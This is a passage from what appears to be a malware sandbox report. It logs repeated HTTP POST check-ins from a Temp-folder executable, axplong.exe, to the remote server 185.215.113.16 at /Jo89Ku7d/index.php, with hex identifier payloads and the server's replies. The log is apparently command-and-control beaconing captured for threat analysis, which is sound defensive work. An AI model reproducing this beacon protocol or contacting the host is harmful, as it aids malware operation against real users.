                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              67192.168.2.651149185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:18.363507986 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:19.160573959 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              68192.168.2.651150185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:19.170006990 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:19.937151909 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              69192.168.2.651151185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:20.061855078 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:20.857263088 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              70192.168.2.651152185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:20.867443085 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:21.668042898 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:21 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              71192.168.2.651154185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:21.808960915 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:22.596292019 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              72192.168.2.651155185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:22.714916945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:23.485802889 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:23 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              73192.168.2.651156185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:23.497180939 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:24.299350977 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:24 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              74192.168.2.651157185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:24.489623070 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:25.318515062 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:25 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              75192.168.2.651158185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:25.426733971 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:26.426301956 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              76192.168.2.651159185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:26.540832043 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:27.329745054 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:27 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              77192.168.2.651160185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:27.355459929 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:28.143049002 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              78192.168.2.651161185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:28.288142920 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:29.105829954 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:28 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              79192.168.2.651162185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:29.131510973 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:29.951849937 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              80192.168.2.651163185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:30.076989889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:30.850505114 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:30 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              81192.168.2.651165185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:30.980807066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:31.837157965 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              82192.168.2.651166185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:31.856188059 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:32.659017086 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              83192.168.2.651167185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:32.796981096 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:33.558598995 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              84192.168.2.651168185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:33.569848061 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:34.375782013 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              85192.168.2.651169185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:34.493619919 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:35.282812119 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              86192.168.2.651170185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:35.293651104 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:36.257325888 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              87192.168.2.651171185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:36.369342089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:37.266617060 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              88192.168.2.651172185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:37.276602030 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:38.076704979 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


